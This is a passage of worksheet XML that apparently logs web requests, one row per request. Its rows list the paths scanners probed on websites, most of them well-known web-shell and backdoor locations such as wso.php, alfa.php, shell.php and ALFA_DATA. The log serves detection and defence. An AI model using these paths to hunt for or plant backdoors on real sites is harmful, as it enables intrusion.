        <v>archives.php</v>
      </c>
      <c r="E3921" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3922" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3922" s="1">
        <v>45208.919930555552</v>
      </c>
      <c r="B3922" t="s">
        <v>1417</v>
      </c>
      <c r="C3922" t="s">
        <v>930</v>
      </c>
      <c r="D3922" t="str">
        <f t="shared" si="61"/>
        <v>wp-content/db-cache.php</v>
      </c>
      <c r="E3922" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3923" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3923" s="1">
        <v>45208.913888888892</v>
      </c>
      <c r="B3923" t="s">
        <v>1417</v>
      </c>
      <c r="C3923" t="s">
        <v>932</v>
      </c>
      <c r="D3923" t="str">
        <f t="shared" si="61"/>
        <v>wp-plugins.php</v>
      </c>
      <c r="E3923" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3924" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3924" s="1">
        <v>45208.908703703702</v>
      </c>
      <c r="B3924" t="s">
        <v>1417</v>
      </c>
      <c r="C3924" t="s">
        <v>933</v>
      </c>
      <c r="D3924" t="str">
        <f t="shared" si="61"/>
        <v>wp-content/plugins/wpconfig.bak.php?act=sf</v>
      </c>
      <c r="E3924" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3925" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3925" s="1">
        <v>45208.905810185184</v>
      </c>
      <c r="B3925" t="s">
        <v>1417</v>
      </c>
      <c r="C3925" t="s">
        <v>934</v>
      </c>
      <c r="D3925" t="str">
        <f t="shared" si="61"/>
        <v>legion.php</v>
      </c>
      <c r="E3925" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3926" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3926" s="1">
        <v>45208.904502314814</v>
      </c>
      <c r="B3926" t="s">
        <v>1417</v>
      </c>
      <c r="C3926" t="s">
        <v>935</v>
      </c>
      <c r="D3926" t="str">
        <f t="shared" si="61"/>
        <v>wp-content/themes/config.bak.php</v>
      </c>
      <c r="E3926" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3927" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3927" s="1">
        <v>45208.904490740744</v>
      </c>
      <c r="B3927" t="s">
        <v>1417</v>
      </c>
      <c r="C3927" t="s">
        <v>936</v>
      </c>
      <c r="D3927" t="str">
        <f t="shared" si="61"/>
        <v>config.bak.php</v>
      </c>
      <c r="E3927" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3928" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3928" s="1">
        <v>45208.902662037035</v>
      </c>
      <c r="B3928" t="s">
        <v>1417</v>
      </c>
      <c r="C3928" t="s">
        <v>937</v>
      </c>
      <c r="D3928" t="str">
        <f t="shared" si="61"/>
        <v>wp-content/mu-plugins/db-safe-mode.php</v>
      </c>
      <c r="E3928" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3929" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3929" s="1">
        <v>45208.898761574077</v>
      </c>
      <c r="B3929" t="s">
        <v>1417</v>
      </c>
      <c r="C3929" t="s">
        <v>938</v>
      </c>
      <c r="D3929" t="str">
        <f t="shared" si="61"/>
        <v>wp-content/plugins/backup_index.php</v>
      </c>
      <c r="E3929" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3930" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3930" s="1">
        <v>45208.898252314815</v>
      </c>
      <c r="B3930" t="s">
        <v>1417</v>
      </c>
      <c r="C3930" t="s">
        <v>939</v>
      </c>
      <c r="D3930" t="str">
        <f t="shared" si="61"/>
        <v>wp-booking.php</v>
      </c>
      <c r="E3930" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3931" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3931" s="1">
        <v>45208.897268518522</v>
      </c>
      <c r="B3931" t="s">
        <v>1417</v>
      </c>
      <c r="C3931" t="s">
        <v>940</v>
      </c>
      <c r="D3931" t="str">
        <f t="shared" si="61"/>
        <v>moduless.php</v>
      </c>
      <c r="E3931" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3932" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3932" s="1">
        <v>45208.895335648151</v>
      </c>
      <c r="B3932" t="s">
        <v>1417</v>
      </c>
      <c r="C3932" t="s">
        <v>942</v>
      </c>
      <c r="D3932" t="str">
        <f t="shared" si="61"/>
        <v>defau1t.php</v>
      </c>
      <c r="E3932" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3933" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3933" s="1">
        <v>45208.892916666664</v>
      </c>
      <c r="B3933" t="s">
        <v>1417</v>
      </c>
      <c r="C3933" t="s">
        <v>943</v>
      </c>
      <c r="D3933" t="str">
        <f t="shared" si="61"/>
        <v>wp-includes/css/css.php</v>
      </c>
      <c r="E3933" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3934" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3934" s="1">
        <v>45208.892893518518</v>
      </c>
      <c r="B3934" t="s">
        <v>1417</v>
      </c>
      <c r="C3934" t="s">
        <v>944</v>
      </c>
      <c r="D3934" t="str">
        <f t="shared" si="61"/>
        <v>wp-includes/images/css.php</v>
      </c>
      <c r="E3934" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3935" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3935" s="1">
        <v>45208.889675925922</v>
      </c>
      <c r="B3935" t="s">
        <v>1417</v>
      </c>
      <c r="C3935" t="s">
        <v>946</v>
      </c>
      <c r="D3935" t="str">
        <f t="shared" si="61"/>
        <v>export.php</v>
      </c>
      <c r="E3935" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3936" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3936" s="1">
        <v>45208.888749999998</v>
      </c>
      <c r="B3936" t="s">
        <v>1417</v>
      </c>
      <c r="C3936" t="s">
        <v>947</v>
      </c>
      <c r="D3936" t="str">
        <f t="shared" si="61"/>
        <v>media-admin.php</v>
      </c>
      <c r="E3936" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3937" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3937" s="1">
        <v>45208.887766203705</v>
      </c>
      <c r="B3937" t="s">
        <v>1417</v>
      </c>
      <c r="C3937" t="s">
        <v>948</v>
      </c>
      <c r="D3937" t="str">
        <f t="shared" si="61"/>
        <v>wp-signin.php?dizo&amp;ping</v>
      </c>
      <c r="E3937" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3938" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3938" s="1">
        <v>45208.881956018522</v>
      </c>
      <c r="B3938" t="s">
        <v>1417</v>
      </c>
      <c r="C3938" t="s">
        <v>949</v>
      </c>
      <c r="D3938" t="str">
        <f t="shared" si="61"/>
        <v>ups.php</v>
      </c>
      <c r="E3938" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3939" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3939" s="1">
        <v>45208.88140046296</v>
      </c>
      <c r="B3939" t="s">
        <v>1417</v>
      </c>
      <c r="C3939" t="s">
        <v>950</v>
      </c>
      <c r="D3939" t="str">
        <f t="shared" si="61"/>
        <v>beence.php</v>
      </c>
      <c r="E3939" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3940" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3940" s="1">
        <v>45208.878946759258</v>
      </c>
      <c r="B3940" t="s">
        <v>1417</v>
      </c>
      <c r="C3940" t="s">
        <v>951</v>
      </c>
      <c r="D3940" t="str">
        <f t="shared" si="61"/>
        <v>wp_wrong_datlib.php</v>
      </c>
      <c r="E3940" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3941" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3941" s="1">
        <v>45208.878125000003</v>
      </c>
      <c r="B3941" t="s">
        <v>1417</v>
      </c>
      <c r="C3941" t="s">
        <v>952</v>
      </c>
      <c r="D3941" t="str">
        <f t="shared" si="61"/>
        <v>doc.php</v>
      </c>
      <c r="E3941" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3942" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3942" s="1">
        <v>45208.876458333332</v>
      </c>
      <c r="B3942" t="s">
        <v>1417</v>
      </c>
      <c r="C3942" t="s">
        <v>959</v>
      </c>
      <c r="D3942" t="str">
        <f t="shared" si="61"/>
        <v>radio.php</v>
      </c>
      <c r="E3942" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3943" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3943" s="1">
        <v>45208.874293981484</v>
      </c>
      <c r="B3943" t="s">
        <v>1417</v>
      </c>
      <c r="C3943" t="s">
        <v>963</v>
      </c>
      <c r="D3943" t="str">
        <f t="shared" si="61"/>
        <v>1index.php</v>
      </c>
      <c r="E3943" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3944" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3944" s="1">
        <v>45208.871574074074</v>
      </c>
      <c r="B3944" t="s">
        <v>1417</v>
      </c>
      <c r="C3944" t="s">
        <v>964</v>
      </c>
      <c r="D3944" t="str">
        <f t="shared" si="61"/>
        <v>s_ne.php</v>
      </c>
      <c r="E3944" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3945" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3945" s="1">
        <v>45208.870868055557</v>
      </c>
      <c r="B3945" t="s">
        <v>1417</v>
      </c>
      <c r="C3945" t="s">
        <v>965</v>
      </c>
      <c r="D3945" t="str">
        <f t="shared" si="61"/>
        <v>s_e.php</v>
      </c>
      <c r="E3945" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3946" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3946" s="1">
        <v>45208.868923611109</v>
      </c>
      <c r="B3946" t="s">
        <v>1417</v>
      </c>
      <c r="C3946" t="s">
        <v>230</v>
      </c>
      <c r="D3946" t="str">
        <f t="shared" si="61"/>
        <v>style.php</v>
      </c>
      <c r="E3946" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3947" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3947" s="1">
        <v>45208.868923611109</v>
      </c>
      <c r="B3947" t="s">
        <v>1417</v>
      </c>
      <c r="C3947" t="s">
        <v>966</v>
      </c>
      <c r="D3947" t="str">
        <f t="shared" si="61"/>
        <v>wp-admin/style.php</v>
      </c>
      <c r="E3947" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3948" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3948" s="1">
        <v>45208.78601851852</v>
      </c>
      <c r="B3948" t="s">
        <v>1418</v>
      </c>
      <c r="C3948" t="s">
        <v>41</v>
      </c>
      <c r="D3948" t="str">
        <f t="shared" si="61"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E3948" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3949" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3949" s="1">
        <v>45208.785844907405</v>
      </c>
      <c r="B3949" t="s">
        <v>1418</v>
      </c>
      <c r="C3949" t="s">
        <v>41</v>
      </c>
      <c r="D3949" t="str">
        <f t="shared" si="61"/>
        <v>wp-content/themes/seotheme/db.php?u</v>
      </c>
      <c r="E3949" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3950" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3950" s="1">
        <v>45208.584814814814</v>
      </c>
      <c r="B3950" t="s">
        <v>1419</v>
      </c>
      <c r="C3950" t="s">
        <v>5</v>
      </c>
      <c r="D3950" t="str">
        <f t="shared" si="61"/>
        <v/>
      </c>
      <c r="E3950" t="s">
        <v>1420</v>
      </c>
    </row>
    <row r="3951" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3951" s="1">
        <v>45208.466527777775</v>
      </c>
      <c r="B3951" t="s">
        <v>1421</v>
      </c>
      <c r="C3951" t="s">
        <v>1422</v>
      </c>
      <c r="D3951" t="str">
        <f t="shared" si="61"/>
        <v>collections/all.atom</v>
      </c>
      <c r="E3951" t="s">
        <v>1423</v>
      </c>
    </row>
    <row r="3952" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3952" s="1">
        <v>45208.466400462959</v>
      </c>
      <c r="B3952" t="s">
        <v>1421</v>
      </c>
      <c r="C3952" t="s">
        <v>5</v>
      </c>
      <c r="D3952" t="str">
        <f t="shared" si="61"/>
        <v/>
      </c>
      <c r="E3952" t="s">
        <v>1423</v>
      </c>
    </row>
    <row r="3953" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3953" s="1">
        <v>45208.289664351854</v>
      </c>
      <c r="B3953" t="s">
        <v>863</v>
      </c>
      <c r="C3953" t="s">
        <v>864</v>
      </c>
      <c r="D3953" t="str">
        <f t="shared" si="61"/>
        <v>sellers.json</v>
      </c>
      <c r="E3953" t="s">
        <v>870</v>
      </c>
    </row>
    <row r="3954" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3954" s="1">
        <v>45208.227650462963</v>
      </c>
      <c r="B3954" t="s">
        <v>1415</v>
      </c>
      <c r="C3954" t="s">
        <v>1424</v>
      </c>
      <c r="D3954" t="str">
        <f t="shared" si="61"/>
        <v>admin-ajax.php</v>
      </c>
      <c r="E3954" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3955" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3955" s="1">
        <v>45208.227488425924</v>
      </c>
      <c r="B3955" t="s">
        <v>1415</v>
      </c>
      <c r="C3955" t="s">
        <v>1424</v>
      </c>
      <c r="D3955" t="str">
        <f t="shared" si="61"/>
        <v>admin-ajax.php</v>
      </c>
      <c r="E3955" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3956" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3956" s="1">
        <v>45208.081296296295</v>
      </c>
      <c r="B3956" t="s">
        <v>1425</v>
      </c>
      <c r="C3956" t="s">
        <v>1426</v>
      </c>
      <c r="D3956" t="str">
        <f t="shared" si="61"/>
        <v>wp-admin/js/widgets/content.php</v>
      </c>
      <c r="E3956" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3957" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3957" s="1">
        <v>45208.080914351849</v>
      </c>
      <c r="B3957" t="s">
        <v>1425</v>
      </c>
      <c r="C3957" t="s">
        <v>1427</v>
      </c>
      <c r="D3957" t="str">
        <f t="shared" si="61"/>
        <v>wp-admin/js/widgets/contents.php</v>
      </c>
      <c r="E3957" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3958" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3958" s="1">
        <v>45208.080717592595</v>
      </c>
      <c r="B3958" t="s">
        <v>1425</v>
      </c>
      <c r="C3958" t="s">
        <v>1428</v>
      </c>
      <c r="D3958" t="str">
        <f t="shared" si="61"/>
        <v>wp-admin/js/widgets/admin.php</v>
      </c>
      <c r="E3958" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3959" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3959" s="1">
        <v>45208.080243055556</v>
      </c>
      <c r="B3959" t="s">
        <v>1425</v>
      </c>
      <c r="C3959" t="s">
        <v>1429</v>
      </c>
      <c r="D3959" t="str">
        <f t="shared" si="61"/>
        <v>wp-admin/js/widgets/about.php</v>
      </c>
      <c r="E3959" t="s">
        <v>13</v>
      </c>
    </row>
    <row r="3960" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3960" s="1">
        <v>45207.882800925923</v>
      </c>
      <c r="B3960" t="s">
        <v>1430</v>
      </c>
      <c r="C3960" t="s">
        <v>893</v>
      </c>
      <c r="D3960" t="str">
        <f t="shared" si="61"/>
        <v>shells.php</v>
      </c>
      <c r="E3960" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3961" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3961" s="1">
        <v>45207.882789351854</v>
      </c>
      <c r="B3961" t="s">
        <v>1430</v>
      </c>
      <c r="C3961" t="s">
        <v>876</v>
      </c>
      <c r="D3961" t="str">
        <f t="shared" si="61"/>
        <v>templates/beez3/</v>
      </c>
      <c r="E3961" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3962" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3962" s="1">
        <v>45207.882789351854</v>
      </c>
      <c r="B3962" t="s">
        <v>1430</v>
      </c>
      <c r="C3962" t="s">
        <v>391</v>
      </c>
      <c r="D3962" t="str">
        <f t="shared" si="61"/>
        <v>about.php</v>
      </c>
      <c r="E3962" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3963" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3963" s="1">
        <v>45207.882777777777</v>
      </c>
      <c r="B3963" t="s">
        <v>1430</v>
      </c>
      <c r="C3963" t="s">
        <v>878</v>
      </c>
      <c r="D3963" t="str">
        <f t="shared" si="61"/>
        <v>config.php</v>
      </c>
      <c r="E3963" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3964" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3964" s="1">
        <v>45207.8827662037</v>
      </c>
      <c r="B3964" t="s">
        <v>1430</v>
      </c>
      <c r="C3964" t="s">
        <v>879</v>
      </c>
      <c r="D3964" t="str">
        <f t="shared" si="61"/>
        <v>alfa.php</v>
      </c>
      <c r="E3964" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3965" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3965" s="1">
        <v>45207.882754629631</v>
      </c>
      <c r="B3965" t="s">
        <v>1430</v>
      </c>
      <c r="C3965" t="s">
        <v>880</v>
      </c>
      <c r="D3965" t="str">
        <f t="shared" si="61"/>
        <v>wp.php</v>
      </c>
      <c r="E3965" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3966" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3966" s="1">
        <v>45207.882743055554</v>
      </c>
      <c r="B3966" t="s">
        <v>1430</v>
      </c>
      <c r="C3966" t="s">
        <v>881</v>
      </c>
      <c r="D3966" t="str">
        <f t="shared" si="61"/>
        <v>test.php</v>
      </c>
      <c r="E3966" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3967" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3967" s="1">
        <v>45207.882731481484</v>
      </c>
      <c r="B3967" t="s">
        <v>1430</v>
      </c>
      <c r="C3967" t="s">
        <v>882</v>
      </c>
      <c r="D3967" t="str">
        <f t="shared" si="61"/>
        <v>a.php</v>
      </c>
      <c r="E3967" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3968" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3968" s="1">
        <v>45207.882719907408</v>
      </c>
      <c r="B3968" t="s">
        <v>1430</v>
      </c>
      <c r="C3968" t="s">
        <v>883</v>
      </c>
      <c r="D3968" t="str">
        <f t="shared" si="61"/>
        <v>z.php</v>
      </c>
      <c r="E3968" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3969" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3969" s="1">
        <v>45207.882708333331</v>
      </c>
      <c r="B3969" t="s">
        <v>1430</v>
      </c>
      <c r="C3969" t="s">
        <v>885</v>
      </c>
      <c r="D3969" t="str">
        <f t="shared" si="61"/>
        <v>1.php</v>
      </c>
      <c r="E3969" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3970" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3970" s="1">
        <v>45207.882708333331</v>
      </c>
      <c r="B3970" t="s">
        <v>1430</v>
      </c>
      <c r="C3970" t="s">
        <v>884</v>
      </c>
      <c r="D3970" t="str">
        <f t="shared" ref="D3970:D4033" si="62">MID(C3970,FIND("#", SUBSTITUTE(C3970, "/", "#", 3))+1,LEN(C3970)-FIND("#", SUBSTITUTE(C3970, "/", "#", 3))+1)</f>
        <v>x.php</v>
      </c>
      <c r="E3970" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3971" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3971" s="1">
        <v>45207.882638888892</v>
      </c>
      <c r="B3971" t="s">
        <v>1430</v>
      </c>
      <c r="C3971" t="s">
        <v>886</v>
      </c>
      <c r="D3971" t="str">
        <f t="shared" si="62"/>
        <v>fox.php</v>
      </c>
      <c r="E3971" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3972" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3972" s="1">
        <v>45207.882326388892</v>
      </c>
      <c r="B3972" t="s">
        <v>1430</v>
      </c>
      <c r="C3972" t="s">
        <v>887</v>
      </c>
      <c r="D3972" t="str">
        <f t="shared" si="62"/>
        <v>upload.php</v>
      </c>
      <c r="E3972" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3973" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3973" s="1">
        <v>45207.882222222222</v>
      </c>
      <c r="B3973" t="s">
        <v>1430</v>
      </c>
      <c r="C3973" t="s">
        <v>887</v>
      </c>
      <c r="D3973" t="str">
        <f t="shared" si="62"/>
        <v>upload.php</v>
      </c>
      <c r="E3973" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3974" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3974" s="1">
        <v>45207.882210648146</v>
      </c>
      <c r="B3974" t="s">
        <v>1430</v>
      </c>
      <c r="C3974" t="s">
        <v>889</v>
      </c>
      <c r="D3974" t="str">
        <f t="shared" si="62"/>
        <v>shell.php</v>
      </c>
      <c r="E3974" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3975" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3975" s="1">
        <v>45207.882210648146</v>
      </c>
      <c r="B3975" t="s">
        <v>1430</v>
      </c>
      <c r="C3975" t="s">
        <v>888</v>
      </c>
      <c r="D3975" t="str">
        <f t="shared" si="62"/>
        <v>up.php</v>
      </c>
      <c r="E3975" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3976" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3976" s="1">
        <v>45207.882199074076</v>
      </c>
      <c r="B3976" t="s">
        <v>1430</v>
      </c>
      <c r="C3976" t="s">
        <v>890</v>
      </c>
      <c r="D3976" t="str">
        <f t="shared" si="62"/>
        <v>wso.php</v>
      </c>
      <c r="E3976" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3977" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3977" s="1">
        <v>45207.882141203707</v>
      </c>
      <c r="B3977" t="s">
        <v>1430</v>
      </c>
      <c r="C3977" t="s">
        <v>891</v>
      </c>
      <c r="D3977" t="str">
        <f t="shared" si="62"/>
        <v>xleet.php</v>
      </c>
      <c r="E3977" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3978" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3978" s="1">
        <v>45207.88175925926</v>
      </c>
      <c r="B3978" t="s">
        <v>1430</v>
      </c>
      <c r="C3978" t="s">
        <v>892</v>
      </c>
      <c r="D3978" t="str">
        <f t="shared" si="62"/>
        <v>olux.php</v>
      </c>
      <c r="E3978" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3979" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3979" s="1">
        <v>45207.881597222222</v>
      </c>
      <c r="B3979" t="s">
        <v>1430</v>
      </c>
      <c r="C3979" t="s">
        <v>894</v>
      </c>
      <c r="D3979" t="str">
        <f t="shared" si="62"/>
        <v>?3x=3x</v>
      </c>
      <c r="E3979" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3980" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3980" s="1">
        <v>45207.881365740737</v>
      </c>
      <c r="B3980" t="s">
        <v>1430</v>
      </c>
      <c r="C3980" t="s">
        <v>895</v>
      </c>
      <c r="D3980" t="str">
        <f t="shared" si="62"/>
        <v>wp-content/plugins/ubh/up.php</v>
      </c>
      <c r="E3980" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3981" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3981" s="1">
        <v>45207.881226851852</v>
      </c>
      <c r="B3981" t="s">
        <v>1430</v>
      </c>
      <c r="C3981" t="s">
        <v>896</v>
      </c>
      <c r="D3981" t="str">
        <f t="shared" si="62"/>
        <v>admin/controller/extension/extension/cgialfa</v>
      </c>
      <c r="E3981" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3982" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3982" s="1">
        <v>45207.880960648145</v>
      </c>
      <c r="B3982" t="s">
        <v>1430</v>
      </c>
      <c r="C3982" t="s">
        <v>897</v>
      </c>
      <c r="D3982" t="str">
        <f t="shared" si="62"/>
        <v>admin/controller/extension/extension/alfacgiapi</v>
      </c>
      <c r="E3982" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3983" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3983" s="1">
        <v>45207.880752314813</v>
      </c>
      <c r="B3983" t="s">
        <v>1430</v>
      </c>
      <c r="C3983" t="s">
        <v>898</v>
      </c>
      <c r="D3983" t="str">
        <f t="shared" si="62"/>
        <v>admin/controller/extension/extension/ALFA_DATA</v>
      </c>
      <c r="E3983" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3984" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3984" s="1">
        <v>45207.880613425928</v>
      </c>
      <c r="B3984" t="s">
        <v>1430</v>
      </c>
      <c r="C3984" t="s">
        <v>899</v>
      </c>
      <c r="D3984" t="str">
        <f t="shared" si="62"/>
        <v>sites/default/files/cgialfa</v>
      </c>
      <c r="E3984" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3985" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3985" s="1">
        <v>45207.880532407406</v>
      </c>
      <c r="B3985" t="s">
        <v>1430</v>
      </c>
      <c r="C3985" t="s">
        <v>900</v>
      </c>
      <c r="D3985" t="str">
        <f t="shared" si="62"/>
        <v>sites/default/files/alfacgiapi</v>
      </c>
      <c r="E3985" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3986" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3986" s="1">
        <v>45207.88040509259</v>
      </c>
      <c r="B3986" t="s">
        <v>1430</v>
      </c>
      <c r="C3986" t="s">
        <v>901</v>
      </c>
      <c r="D3986" t="str">
        <f t="shared" si="62"/>
        <v>sites/default/files/ALFA_DATA</v>
      </c>
      <c r="E3986" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3987" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3987" s="1">
        <v>45207.880196759259</v>
      </c>
      <c r="B3987" t="s">
        <v>1430</v>
      </c>
      <c r="C3987" t="s">
        <v>902</v>
      </c>
      <c r="D3987" t="str">
        <f t="shared" si="62"/>
        <v>templates/beez3/cgialfa</v>
      </c>
      <c r="E3987" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3988" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3988" s="1">
        <v>45207.88009259259</v>
      </c>
      <c r="B3988" t="s">
        <v>1430</v>
      </c>
      <c r="C3988" t="s">
        <v>903</v>
      </c>
      <c r="D3988" t="str">
        <f t="shared" si="62"/>
        <v>templates/beez3/alfacgiapi</v>
      </c>
      <c r="E3988" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3989" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3989" s="1">
        <v>45207.879872685182</v>
      </c>
      <c r="B3989" t="s">
        <v>1430</v>
      </c>
      <c r="C3989" t="s">
        <v>904</v>
      </c>
      <c r="D3989" t="str">
        <f t="shared" si="62"/>
        <v>templates/beez3/ALFA_DATA</v>
      </c>
      <c r="E3989" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3990" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3990" s="1">
        <v>45207.87972222222</v>
      </c>
      <c r="B3990" t="s">
        <v>1430</v>
      </c>
      <c r="C3990" t="s">
        <v>905</v>
      </c>
      <c r="D3990" t="str">
        <f t="shared" si="62"/>
        <v>wp-content/cgialfa</v>
      </c>
      <c r="E3990" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3991" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3991" s="1">
        <v>45207.879583333335</v>
      </c>
      <c r="B3991" t="s">
        <v>1430</v>
      </c>
      <c r="C3991" t="s">
        <v>906</v>
      </c>
      <c r="D3991" t="str">
        <f t="shared" si="62"/>
        <v>wp-content/alfacgiapi</v>
      </c>
      <c r="E3991" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3992" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3992" s="1">
        <v>45207.87940972222</v>
      </c>
      <c r="B3992" t="s">
        <v>1430</v>
      </c>
      <c r="C3992" t="s">
        <v>907</v>
      </c>
      <c r="D3992" t="str">
        <f t="shared" si="62"/>
        <v>wp-content/ALFA_DATA</v>
      </c>
      <c r="E3992" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3993" spans="1:5" x14ac:dyDescent="0.35">
      <c r="A3993" s="1">
        <v>45207.879201388889</v>
      </c>
      <c r="B3993" t="s">
        <v>1430</v>
      </c>
      <c r="C3993" t="s">
        <v>908</v>
      </c>
      <c r="D3993" t="str">
        <f t="shared" si="62"/>
        <v>wp-admin/cgialfa</v>
      </c>
      <c r="E3993" t="s">
        <v>877</v>
      </c>
    </row>
    <row r="3994" spans="1:5" x14ac:dyDescent="0.35">
